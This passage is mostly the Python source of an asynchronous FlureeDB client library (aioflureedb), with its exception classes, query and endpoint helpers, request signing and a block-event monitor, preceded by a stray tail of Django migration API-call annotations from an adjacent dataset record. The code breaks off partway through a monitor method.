serialize=False,\n verbose_name='ID')\n", (2308, 2385), False, 'from django.db import migrations, models\n'), ((2409, 2441), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (2425, 2441), False, 'from django.db import migrations, models\n'), ((2469, 2498), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (2496, 2498), False, 'from django.db import migrations, models\n'), ((2533, 2551), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (2549, 2551), False, 'from django.db import migrations, models\n'), ((2580, 2641), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'null': '(True)', 'upload_to': '"""movies/"""'}), "(blank=True, null=True, upload_to='movies/')\n", (2597, 2641), False, 'from django.db import migrations, models\n')]
|
#!/usr/bin/python3
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=simplifiable-if-statement
"""Basic asynchonous client library for FlureeDB"""
import sys
import asyncio
import json
import time
import aiohttp
from aioflureedb.signing import DbSigner
from aioflureedb.domain_api import FlureeDomainAPI
class FlureeException(Exception):
    """Base exception class for aioflureedb.

    All library-specific errors derive from this type so callers can
    catch any aioflureedb failure with a single except clause.
    """

    def __init__(self, message):
        """Initialize with a human-readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeHttpError(FlureeException):
    """Raised when the Fluree server answers with a non-200 HTTP status."""

    def __init__(self, message, status):
        """Store the HTTP status alongside the response-body message.

        Parameters
        ----------
        message : str
            Error message (typically the HTTP response body)
        status : int
            HTTP status code
        """
        self.status = status
        super().__init__(message)
class FlureeHalfCredentials(FlureeException):
    """Raised when only part of a credential pair was supplied."""

    def __init__(self, message):
        """Initialize with a human-readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeKeyRequired(FlureeException):
    """Raised when an endpoint that requires signing is invoked without a signing key."""

    def __init__(self, message):
        """Initialize with a human-readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeTransactionFailure(FlureeException):
    """Raised when a Fluree transaction fails."""

    def __init__(self, message):
        """Initialize with a human-readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeUnexpectedPredicateNumber(FlureeException):
    """Raised on an unexpected predicate number.

    The original docstring ("Fluree transaction failed") was a copy-paste
    of FlureeTransactionFailure's; this class signals a predicate-number
    mismatch, per its name and usage.
    """

    def __init__(self, message):
        """Initialize with a human-readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
_FLUREEQLQUERY_ENDPOINT_PERMISSIONS = {
'query': {
'permitted': {"select", "selectOne", "selectDistinct", "from", "where", "block", "prefixes", "vars", "opts"},
'depricated': {"filter", "union", "optional", "limit", "offset", "orderBy", "groupBy", "prettyPrint"}
},
'block': {
'permitted': {"block"},
'depricated': {'prettyPrint'}
},
'list_snapshots': {
'permitted': {},
'depricated': {}
},
'snapshot': {
'permitted': {},
'depricated': {}
}
}
class _FlureeQlSubQuery:
    """Helper for building one named sub-query of a FlureeQL multi-query."""

    def __init__(self, endpoint, method):
        """Constructor

        Parameters
        ----------
        endpoint : _FlureeQlEndpoint
            API endpoint for communicating FlureeQL queries with FlureeDB
        method : str
            Name for the sub-query
        """
        self.endpoint = endpoint
        self.method = method
        rules = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]
        self.permittedkeys = rules['permitted']
        self.depricatedkeys = rules['depricated']

    def __call__(self, **kwargs):
        """Build a FlureeQL sub-query from keyword arguments and register it.

        The result is stored on the endpoint's multi_query under this
        sub-query's name.

        Parameters
        ----------
        kwargs : dict
            Keyword arguments for different parts of a FlureeQL query.

        Raises
        ------
        TypeError
            If an unknown kwarg value is used.
        """
        # 'from' and 'filter' clash with Python keywords/builtins, so the
        # public API takes 'ffrom'/'ffilter' and maps them back here.
        renames = {"ffrom": "from", "ffilter": "filter"}
        obj = {}
        for key, value in kwargs.items():
            key = renames.get(key, key)
            if key not in self.permittedkeys:
                if key not in self.depricatedkeys:
                    raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
                print("WARNING: Use of depricated FlureeQL syntax,",
                      key,
                      "should not be used as top level key in queries",
                      file=sys.stderr)
            obj[key] = value
        self.endpoint.multi_query[self.method] = obj
class _FlureeQlQuery:
    """Keyword-argument syntactic sugar for FlureeQL query endpoints."""

    def __init__(self, endpoint):
        """Constructor

        Parameters
        ----------
        endpoint : _FlureeQlEndpoint
            API endpoint for communicating FlureeQL queries with FlureeDB
        """
        self.endpoint = endpoint
        rules = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]
        self.permittedkeys = rules['permitted']
        self.depricatedkeys = rules['depricated']

    async def __call__(self, **kwargs):
        """Build a FlureeQL query from keyword arguments and execute it.

        Parameters
        ----------
        kwargs : dict
            Keyword arguments for different parts of a FlureeQL query.

        Raises
        ------
        TypeError
            If an unknown kwarg value is used.

        Returns
        -------
        dict
            json decode result from the server.
        """
        # 'from' and 'filter' clash with Python keywords/builtins, so the
        # public API takes 'ffrom'/'ffilter' and maps them back here.
        renames = {"ffrom": "from", "ffilter": "filter"}
        obj = {}
        for key, value in kwargs.items():
            key = renames.get(key, key)
            if key not in self.permittedkeys:
                if key not in self.depricatedkeys:
                    raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
                print("WARNING: Use of depricated FlureeQL syntax,",
                      key,
                      "should not be used as top level key in queries",
                      file=sys.stderr)
            obj[key] = value
        return await self.endpoint.actual_query(obj)

    async def raw(self, obj):
        """Send a readily constructed FlureeQL dict to the query endpoint.

        Parameters
        ----------
        obj : dict
            Complete FlureeQl query object.

        Returns
        -------
        dict
            json decode result from the server.
        """
        return await self.endpoint.actual_query(obj)
class _UnsignedGetter:
    """Get info with a GET instead of a POST"""
    def __init__(self, session, url, ssl_verify_disabled=False, ready=None):
        """Constructor
        Parameters
        ----------
        session : aiohttp.ClientSession
            HTTP session for doing HTTP post/get with
        url : string
            URL of the API endpoint.
        ssl_verify_disabled: bool
            If https, don't verify ssl certs
        ready : string
            If defined, provide a ready method to wait for ready condition to become true.
        """
        self.session = session
        self.url = url
        self.ssl_verify_disabled = ssl_verify_disabled
        self.ready_field = ready

    async def __call__(self):
        """Invoke the functor
        Returns
        -------
        dict
            JSON decoded response from the server
        Raises
        ------
        FlureeHttpError
            If the server returns something different than a 200 OK status
        """
        # Pass ssl=False only when certificate validation is explicitly disabled.
        get_kwargs = {"ssl": False} if self.ssl_verify_disabled else {}
        async with self.session.get(self.url, **get_kwargs) as resp:
            if resp.status != 200:
                raise FlureeHttpError(await resp.text(), resp.status)
            response = await resp.text()
        return json.loads(response)

    async def ready(self):
        """Redo get untill ready condition gets met"""
        if self.ready_field is None:
            print("WARNING: no ready for this endpoint", file=sys.stderr)
            return
        while True:
            try:
                obj = await self()
                if obj[self.ready_field]:
                    return
            except (FlureeHttpError, aiohttp.client_exceptions.ClientConnectorError):
                # Server not up (yet) or not ready; keep polling.
                pass
            await asyncio.sleep(0.5)
class _SignedPoster:
"""Basic signed HTTP posting"""
def __init__(self, client, session, signer, url, required, optional, ssl_verify_disabled, unsigned=False):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient used for checking for new databases
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
signer : aioflureedb.signing.DbSigner
ECDSA signer for Fluree transactions and queries
url : string
URL of the API endpoint
required : set
Set of required fields for the specific API call.
optional : set
Set of optional fields for the specific API call.
ssl_verify_disabled: bool
If https, ignore ssl certificate issues.
unsigned : bool
If True, don't sign posts.
"""
self.client = client
self.session = session
self.signer = signer
self.url = url
self.required = required
self.optional = optional
self.unsigned = unsigned
if self.signer is None:
self.unsigned = True
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server, dict if decodable json
Raises
------
FlureeHttpError
When Fluree server returns a status code other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
async def __call__(self, **kwargs):
"""Invoke post API
Parameters
----------
kwargs : dict
Keyword arguments for the POST API call.
Returns
-------
dict
JSON decoded response from FlureeDB server
Raises
------
TypeError
If an unknown kwarg is used on invocation OR a required kwarg is not supplied
"""
# pylint: disable=too-many-locals
kwset = set()
kwdict = {}
for key, value in kwargs.items():
if not (key in self.required or key in self.optional):
raise TypeError("SignedPoster got unexpected keyword argument '" + key + "'")
kwset.add(key)
if key == "db_id":
kwdict["db/id"] = value
else:
kwdict[key] = value
for reqkey in self.required:
if reqkey not in kwset:
raise TypeError("SignedPoster is missing one required named argument '", reqkey, "'")
body = json.dumps(kwdict, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
if not self.unsigned:
body, headers, _ = self.signer.sign_query(kwdict)
rval = await self._post_body_with_headers(body, headers)
# If this is a new-db, we need to await till it comes into existance.
if isinstance(rval, str) and len(rval) == 64 and self.url.split("/")[-1] == "new-db" and "db_id" in kwargs:
dbid = kwargs["db_id"]
while True:
databases = await self.client.dbs()
for database in databases:
dbid2 = database[0] + "/" + database[1]
if dbid == dbid2:
return True
await asyncio.sleep(0.1)
return rval
class _Network:
"""Helper class for square bracket interface to Fluree Client"""
def __init__(self, flureeclient, netname, options):
"""Constructor
Parameters
----------
flureeclient : FlureeClient
FlureeClient object to use as reference.
netname : string
Name of the network for net/db fluree database naming.
options : set
Set with existing databases within network.
"""
self.client = flureeclient
self.netname = netname
self.options = options
def __str__(self):
"""Cast to string
Returns
-------
str
Name of the network
"""
return self.netname
def __getitem__(self, key):
"""Square brackets operator
Parameters
----------
key : string
Name of the desired database
Returns
-------
_DbFunctor
Function for constructing a Fluree Database client.
Raises
------
KeyError
When a non defined database is requested.
"""
database = self.netname + "/" + key
if key not in self.options:
raise KeyError("No such database: '" + database + "'")
return _DbFunctor(self.client, database)
def __iter__(self):
"""Iterate over databases in network
Yields
------
string
Name of the database
_DbFunctor
Function object for getting a FlureeDB database object for this particular DB.
"""
for key in self.options:
database = self.netname + "/" + key
yield _DbFunctor(self.client, database)
class _DbFunctor:
"""Helper functor class for square bracket interface to Fluree Client"""
def __init__(self, client, database):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient object to use as reference.
database : string
Full database name
"""
self.client = client
self.database = database
def __str__(self):
"""Cast to string
Returns
-------
str
Database name
"""
return self.database
def __call__(self, privkey=None, auth_address=None, sig_validity=120, sig_fuel=1000):
"""Invoke functor
Parameters
----------
privkey : string
Private key for the specific DB.
auth_address : string
Auth ID belonging with the privkey
sig_validity : int
Validity in seconda of signatures.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Returns
-------
_FlureeDbClient
FlureeClient derived client for a specific DB
"""
return _FlureeDbClient(privkey,
auth_address,
self.database,
self.client.host,
self.client.port,
self.client.https,
self.client.ssl_verify,
sig_validity,
sig_fuel)
class FlureeClient:
    """Basic asynchonous client for FlureeDB for non-database specific APIs"""
    def __init__(self,
                 masterkey=None,
                 auth_address=None,
                 host="localhost",
                 port=8080,
                 https=False,
                 ssl_verify=True,
                 sig_validity=120,
                 sig_fuel=1000):
        """Constructor
        Parameters
        ----------
        masterkey : string
            Hex or base58 encoded signing key
        auth_address : string
            key-id of the signing key
        host : string
            hostname of the FlureeDB server. Defaults to localhost.
        port : int
            port of the FlureeDB server. Defaults to 8080
        https : bool
            Boolean indicating flureeDB is running behind a HTTPS proxy
        ssl_verify : bool
            Boolean, if False, indicating to not verify ssl certs.
        sig_validity : int
            Validity in seconda of the signature.
        sig_fuel : int
            Not sure what this is for, consult FlureeDB documentation for info.
        Raises
        ------
        FlureeHalfCredentials
            If masterkey is specified but auth_address isn't, or the other way around.
        """
        self.host = host
        self.port = port
        self.https = https
        self.ssl_verify = ssl_verify
        # Cert validation is only skipped when explicitly disabled on an https link.
        self.ssl_verify_disabled = https and not ssl_verify
        self.signer = None
        if masterkey and auth_address:
            self.signer = DbSigner(masterkey, auth_address, None, sig_validity, sig_fuel)
        if masterkey and not auth_address or auth_address and not masterkey:
            raise FlureeHalfCredentials("masterkey and auth_address should either both be specified, or neither")
        self.session = aiohttp.ClientSession()
        self.known_endpoints = set(["dbs",
                                    "new_db",
                                    "delete_db",
                                    "add_server",
                                    "remove_server",
                                    "health",
                                    "new_keys"])
        self.unsigned_endpoints = set(["dbs", "health", "new_keys"])
        self.use_get = set(["health", "new_keys"])
        self.required = {}
        self.required["new_db"] = set(["db_id"])
        self.required["delete_db"] = set(["db_id"])
        self.required["add_server"] = set(["server"])
        # BUGFIX: this entry was keyed "delete_server", which is not a known endpoint,
        # so the required-argument check for "remove_server" never applied.
        self.required["remove_server"] = set(["server"])
        self.optional = {"new_db": set(["snapshot"])}
        # "new_keys" was listed twice here; sets dedupe, so listing it once is equivalent.
        self.implemented = set(["dbs",
                                "new_keys",
                                "health",
                                "new_db",
                                "delete_db",
                                "add_server",
                                "remove_server"])

    async def __aenter__(self):
        """Method for allowing 'with' constructs
        Returns
        -------
        FlureeClient
            this fluree client
        """
        return self

    async def __aexit__(self, exc_type, exc, traceback):
        """Async context manager exit; closes the HTTP session."""
        await self.close_session()

    def __dir__(self):
        """Dir function for class
        Returns
        -------
        list
            List of defined (pseudo) attributes
        """
        # BUGFIX: the __aenter__/__aexit__ entries used to carry stray leading spaces.
        return list(self.known_endpoints) + ["close_session",
                                             "__init__",
                                             "__dir__",
                                             "__getattr__",
                                             "__getitem__",
                                             "__aiter__",
                                             "__aenter__",
                                             "__aexit__"]

    def __getattr__(self, api_endpoint):
        """Select API endpoint
        Parameters
        ----------
        api_endpoint : string
            Name of the API endpoint.
        Returns
        -------
        object
            Endpoint object suitable for API endpoint.
        Raises
        ------
        AttributeError
            When a non-defined fluree endpoint is designated
        NotImplementedError
            When a fluree API endpoint is designated that hasn't been implemented yet.
        """
        if api_endpoint not in self.known_endpoints:
            raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
        if api_endpoint not in self.implemented:
            raise NotImplementedError("No implementation yet for " + api_endpoint)
        secure = "s" if self.https else ""
        # Fluree uses dashes in endpoint paths where python identifiers use underscores.
        url = "http" + secure + "://" + self.host + ":" + str(self.port) + \
              "/fdb/" + "-".join(api_endpoint.split("_"))
        signed = api_endpoint not in self.unsigned_endpoints
        use_get = api_endpoint in self.use_get
        required = self.required.get(api_endpoint, set())
        optional = self.optional.get(api_endpoint, set())
        if signed:
            return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled)
        if use_get:
            # The health endpoint exposes a "ready" field we can poll on.
            if api_endpoint == "health":
                return _UnsignedGetter(self.session, url, self.ssl_verify_disabled, ready="ready")
            return _UnsignedGetter(self.session, url, self.ssl_verify_disabled)
        return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled, unsigned=True)

    async def __getitem__(self, key):
        """Square bracket operator
        Parameters
        ----------
        key : string
            Network name, should be defined on server. May be a "net/db" pair.
        Raises
        ------
        KeyError
            When a non-defined network is designated.
        Returns
        -------
        _Network
            Helper object for designating databases within a network.
        """
        subkey = None
        if "/" in key:
            # "net/db" shorthand: look up the network, then the database within it.
            parts = key.split("/")
            key = parts[0]
            subkey = parts[1]
        databases = await self.dbs()
        options = set()
        for pair in databases:
            if pair[0] == key:
                options.add(pair[1])
        if not bool(options):
            raise KeyError("No such network: '" + key + "'")
        network = _Network(self, key, options)
        if subkey is None:
            return network
        return network[subkey]

    async def __aiter__(self):
        """Iterate over all networks
        Yields
        ------
        _Network
            Itteratable object with databases per network.
        """
        databases = await self.dbs()
        optionsmap = {}
        for pair in databases:
            network = pair[0]
            database = pair[1]
            if network not in optionsmap:
                optionsmap[network] = set()
            optionsmap[network].add(database)
        for key, item in optionsmap.items():
            yield _Network(self, key, item)

    async def close_session(self):
        """Close HTTP(S) session to FlureeDB"""
        if self.session:
            await self.session.close()
        return
class _FlureeDbClient:
"""Basic asynchonous client for FlureeDB representing a particular database on FlureeDB"""
    def __init__(self,
                 privkey,
                 auth_address,
                 database,
                 host="localhost",
                 port=8080,
                 https=False,
                 ssl_verify=True,
                 sig_validity=120,
                 sig_fuel=1000):
        """Constructor
        Parameters
        ----------
        privkey : string
            Hex or base58 encoded signing key
        auth_address : string
            key-id of the signing key
        database : string
            net/db string of the flureeDB database
        host : string
            hostname of the FlureeDB server. Defaults to localhost.
        port : int
            port of the FlureeDB server. Defaults to 8080
        https : bool
            Boolean indicating flureeDB is running behind a HTTPS proxy
        ssl_verify : bool
            Boolean, when false, indicating no validation of ssl certs.
        sig_validity : int
            Validity in seconda of the signature.
        sig_fuel : int
            Not sure what this is for, consult FlureeDB documentation for info.
        """
        self.database = database
        self.host = host
        self.port = port
        self.https = https
        self.ssl_verify_disabled = False
        # Shared state for the block-event monitor machinery (see the monitor_* methods).
        self.monitor = {}
        self.monitor["listeners"] = {}  # collection name -> {"C"/"U"/"D" -> set of callbacks}
        self.monitor["running"] = False  # True while monitor_untill_stopped is active
        self.monitor["next"] = None  # next block number the monitor should process
        self.monitor["rewind"] = 0  # seconds to rewind at monitor start
        self.monitor["on_block_processed"] = None  # persistence callback, called per block
        self.monitor["predicate_map"] = {}  # predicate id -> predicate name
        self.monitor["predicate_map_multi"] = {}  # predicate name -> bool ("multi" predicate)
        self.monitor["predicate_map_block"] = 0  # block the predicate map was last built for
        self.monitor["lastblock_instant"] = None  # instant (epoch millis) of last processed block
        self.monitor["instant_monitors"] = []  # [predicate, offset-millis, callback] triples
        if https and not ssl_verify:
            self.ssl_verify_disabled = True
        self.signer = None
        # Signing is optional; without credentials the client runs in open-API mode.
        if privkey and auth_address:
            self.signer = DbSigner(privkey, auth_address, database, sig_validity, sig_fuel)
        self.session = None
        self.session = aiohttp.ClientSession()
        self.known_endpoints = set(["snapshot",
                                    "list_snapshots",
                                    "export",
                                    "query",
                                    "flureeql",
                                    "multi_query",
                                    "block",
                                    "history",
                                    "transact",
                                    "graphql",
                                    "sparql",
                                    "command",
                                    "reindex",
                                    "hide",
                                    "gen_flakes",
                                    "query_with",
                                    "test_transact_with",
                                    "block_range_with",
                                    "ledger_stats",
                                    "storage",
                                    "pw"])
        self.pw_endpoints = set(["generate", "renew", "login"])
        self.implemented = set(["query",
                                "flureeql",
                                "block",
                                "command",
                                "ledger_stats",
                                "list_snapshots",
                                "snapshot",
                                "multi_query"])
    def monitor_init(self, on_block_processed, start_block=None, rewind=0, always_query_object=False, start_instant=None):
        """Set the basic variables for a fluree block event monitor run
        Parameters
        ----------
        on_block_processed: callable
            Callback to invoke when a block has been fully processed.
        start_block: int
            Block number to start at, instead of the next block to arive on the blockchain
        rewind: int
            Number of seconds to rewind from now (consumed later by the monitor loop).
        always_query_object: bool
            Boolean choosing if we want to run efficiently and only query if block parsing gives ambiguous results,
            or if we always want to use extra queries
        start_instant: int
            If (and only if) instant monitor callbacks are used, this parameter should be provided to avoid
            large replays of inactive chain instant events that occured after the last block. Use the instant
            as provided py the persistence callback in the previous run.
        Raises
        ------
        AssertionError
            If on_block_processed is not callable, or start_block/rewind have the wrong type.
        """
        # Input validation via assert; note this is stripped when running with -O.
        assert callable(on_block_processed)
        assert start_block is None or isinstance(start_block, int)
        assert isinstance(rewind, int)
        self.monitor["next"] = start_block
        self.monitor["rewind"] = rewind
        self.monitor["always_query_object"] = always_query_object
        self.monitor["on_block_processed"] = on_block_processed
        self.monitor["lastblock_instant"] = start_instant
def monitor_register_create(self, collection, callback):
"""Add a callback for create events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when create event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "C" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["C"] = set()
self.monitor["listeners"][collection]["C"].add(callback)
def monitor_register_delete(self, collection, callback):
"""Add a callback for delete events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when delete event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "D" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["D"] = set()
self.monitor["listeners"][collection]["D"].add(callback)
def monitor_register_update(self, collection, callback):
"""Add a callback for update events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when update event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "U" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["U"] = set()
self.monitor["listeners"][collection]["U"].add(callback)
def monitor_instant(self, predicate, callback, offset=0):
"""Ass a callback for the passing of time on an instant predicate
Parameters
----------
predicate: str
Name of the instant predicate to monitor
callback: callable
Callback to invoke when the time (plus offset) passes the monitored instant
offset: int
If specified, number of seconds from monitored instant value to trigger on
"""
self.monitor["instant_monitors"].append([predicate, offset*1000, callback])
def monitor_close(self):
"""Abort running any running monitor"""
self.monitor["running"] = False
    async def _figure_out_next_block(self):
        """Figure out what block the user wants/needs to be the next block.

        When a non-zero rewind is configured, query FlureeDB for the oldest block
        whose instant lies within the rewind window and store its number in
        self.monitor["next"]. When no block lies within the window, "next" is cleared.
        """
        if self.monitor["rewind"] != 0 and self.monitor["rewind"] is not None:
            # FlureeQL filter: blocks whose instant is within the last `rewind` seconds
            # (rewind is in seconds, instants in millis, hence the * 1000).
            filt = "(> ?instant (- (now) (* 1000 " + str(self.monitor["rewind"]) + "))))"
            rewind_block = await self.flureeql.query(
                select=["?blockid"],
                opts={"orderBy": ["ASC", "?instant"], "limit": 1},
                where=[
                    ["?block", "_block/instant", "?instant"],
                    ["?block", "_block/number", "?blockid"],
                    {"filter": [filt]}
                ])
            # Adopt the rewind block only when it is newer than any explicitly
            # requested start block.
            if rewind_block and (self.monitor["next"] is None or self.monitor["next"] < rewind_block[0][0]):
                self.monitor["next"] = rewind_block[0][0]
            if not rewind_block:
                self.monitor["next"] = None
    async def _build_predicates_map(self, block=None):
        """Build a predicates map for quick lookup.

        Updates self.monitor["predicate_map"] (predicate id -> name) and
        self.monitor["predicate_map_multi"] (name -> bool) in place.

        Parameters
        ----------
        block : int
            If given, build the map as of this block; skipped (no query, no update)
            when the cached map was already built for this exact block.
        """
        if block is not None:
            if self.monitor["predicate_map_block"] != block:
                predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate", block=block)
                self.monitor["predicate_map_block"] = block
            else:
                # Cache hit: keep the existing maps untouched.
                predicates = None
        else:
            predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate")
        if predicates is not None:
            predicate = {}
            is_multi = {}
            for pred in predicates:
                predicate[pred["_id"]] = pred["name"]
                # Predicates without an explicit "multi" flag default to single-valued.
                if "multi" in pred:
                    is_multi[pred["name"]] = pred["multi"]
                else:
                    is_multi[pred["name"]] = False
            self.monitor["predicate_map"] = predicate
            self.monitor["predicate_map_multi"] = is_multi
async def _find_start_block(self):
"""Find the start block
Returns
-------
int
Number of the starting block
Raises
------
RuntimeError
Raised when the very first ledger_stats issued to FlureeDB returns an error.
"""
if self.monitor["next"] is None:
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
startblock = stats["data"]["block"]
else:
raise RuntimeError("Invalid initial response from ledger_stats")
else:
startblock = self.monitor["next"]
return startblock
async def _get_endblock(self, errorcount=0):
"""Get what for now should be the ending block
Parameters
----------
errorcount: int
Counter for counting succesive API failure
Returns
-------
int
The ending block number
int
An updated version of the errorcount argument
"""
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
endblock = stats["data"]["block"]
return endblock, 0
return 0, errorcount + 1
def _get_flakeset_collection(self, flakelist):
"""Helper function for getting the collection name from a flakes array
Parameters
----------
flakelist : list
list of flake lists
Returns
-------
str
Name of the collection.
"""
return flakelist[0][1].split("/")[0]
    async def _group_block_flakes(self, block_data, blockno):
        """Return a grouped-by object-id and predicate name patched version of a block
        Parameters
        ----------
        block_data : list
            Raw block data as returned by FlureeDB
        blockno : int
            Number of the block currently being processed.
        Returns
        -------
        dict
            A dictionary of object id's to flake arrays.
        Raises
        ------
        FlureeUnexpectedPredicateNumber
            Raised when an unknown predicate id is detected.
        """
        has_predicate_updates = False
        grouped = {}
        for flake in block_data[0]["flakes"]:
            predno = flake[1]
            # Patch numeric predicates to textual ones (mutates the flake in place).
            if predno in self.monitor["predicate_map"]:
                flake[1] = self.monitor["predicate_map"][predno]
            else:
                raise FlureeUnexpectedPredicateNumber("Need a restart after new predicates are added to the database")
            # Group the flakes together by object.
            if not flake[0] in grouped:
                grouped[flake[0]] = []
            grouped[flake[0]].append(flake)
        # pylint: disable=consider-using-dict-items
        for obj in grouped:
            if grouped[obj][0][1].split("/")[0] == "_predicate":
                has_predicate_updates = True
        # pylint: enable=consider-using-dict-items
        # The block itself changed the schema; refresh the predicate maps so
        # subsequent blocks resolve the new predicate ids.
        if has_predicate_updates:
            await self._build_predicates_map(blockno)
        return grouped
def _get_transactions_and_temp_ids(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
list
list of operations from this transaction
dict
map of temporary ids.
"""
operations = None
tempids = None
for flake in flakeset:
if flake[1] == '_tx/tempids':
try:
tid_obj = json.loads(flake[2])
if isinstance(tid_obj, dict):
tempids = tid_obj
except json.decoder.JSONDecodeError:
pass
elif flake[1] == "_tx/tx":
try:
tx_obj = json.loads(flake[2])
if isinstance(tx_obj, dict) and "tx" in tx_obj and isinstance(tx_obj["tx"], list):
operations = tx_obj["tx"]
except json.decoder.JSONDecodeError:
pass
return operations, tempids
def _get_block_instant(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
int
Time instance value for this block
"""
instance = None
for flake in flakeset:
if flake[1] == '_block/instant':
instance = flake[2]
return instance
async def _get_block_instant_by_blockno(self, block):
"""Get the instant timestamp for a given block number
Parameters
----------
block: int
Block number
Returns
-------
int
Time instance value for this block
"""
result = await self.flureeql.query(
select=["?instant"],
where=[
["?block", "_block/instant", "?instant"],
["?block", "_block/number", block]
]
)
if result:
return result[0][0]
return None
    def _get_object_id_to_operation_map(self, tempids, operations):
        """Process temp ids and operations, return an object id to operation map.
        Parameters
        ----------
        tempids : dict
            Temp-id map (temp id string -> real object id)
        operations : list
            List of transaction operations from the _tx/tx flake
        Returns
        -------
        dict
            object id to operation map; may also contain the "" key mapping to the
            single operation of a one-operation transaction.
        """
        # pylint: disable=too-many-nested-blocks, too-many-branches
        obj_tx = {}
        if tempids:
            for tmp_id in tempids:
                real_id = tempids[tmp_id]
                # Per tmp_id occurrence counters for the "name$N" disambiguation scheme.
                counters = {}
                if isinstance(real_id, int):
                    for operation in operations:
                        if isinstance(operation, dict) and "_id" in operation:
                            if isinstance(operation["_id"], str):
                                # Direct match on the operation's string _id.
                                if operation["_id"] == tmp_id:
                                    obj_tx[real_id] = operation
                                if operation["_id"] not in counters:
                                    counters[operation["_id"]] = 0
                                counters[operation["_id"]] += 1
                                # Fluree numbers repeated temp ids as "name$1", "name$2", ...
                                altname = operation["_id"] + "$" + str(counters[operation["_id"]])
                                if altname == tmp_id:
                                    obj_tx[real_id] = operation
                            elif isinstance(operation["_id"], list):
                                # Two-tuple _id: match against its '["a" "b"]' string form.
                                if len(operation["_id"]) == 2:
                                    txid = '["' + operation["_id"][0] + '" "' + operation["_id"][1] + '"]'
                                    if txid == tmp_id:
                                        obj_tx[real_id] = operation
        # A single-operation transaction acts as fallback for any object ("" key).
        if len(operations) == 1:
            obj_tx[""] = operations[0]
        # Operations addressing an existing object by integer _id map directly.
        for operation in operations:
            if isinstance(operation, dict) and "_id" in operation:
                if isinstance(operation["_id"], int):
                    obj_tx[operation["_id"]] = operation
        return obj_tx
    async def _do_instant_monitor(self, oldinstant, newinstant, blockno):
        """Fire registered instant-monitor callbacks for instants inside a time window.
        Parameters
        ----------
        oldinstant : int
            Start of the window in epoch millis (exclusive, after offset correction).
        newinstant : int
            End of the window in epoch millis (inclusive, after offset correction).
        blockno : int
            Block number to run the lookup query against.
        """
        for monitor in self.monitor["instant_monitors"]:
            # Each monitor is a [predicate, offset-in-millis, callback] triple,
            # as registered by monitor_instant.
            predicate = monitor[0]
            offset = monitor[1]
            callback = monitor[2]
            # Shift the window back by the offset so triggering happens
            # `offset` millis after the stored instant.
            windowstart = oldinstant - offset
            windowstop = newinstant - offset
            filt = "(and (> ?instant " + str(windowstart) + ") (<= ?instant " + str(windowstop) + "))"
            eventlist = await self.flureeql.query(
                select=[{"?whatever": ["*"]}],
                opts={"orderBy": ["ASC", "?instant"]},
                where=[
                    ["?whatever", predicate, "?instant"],
                    {"filter": [filt]}
                ],
                block=blockno
            )
            for event in eventlist:
                await callback(event)
    async def _process_instant(self, instant, block, fromblock):
        """Advance the instant-monitor clock and fire due instant callbacks.
        Parameters
        ----------
        instant : int
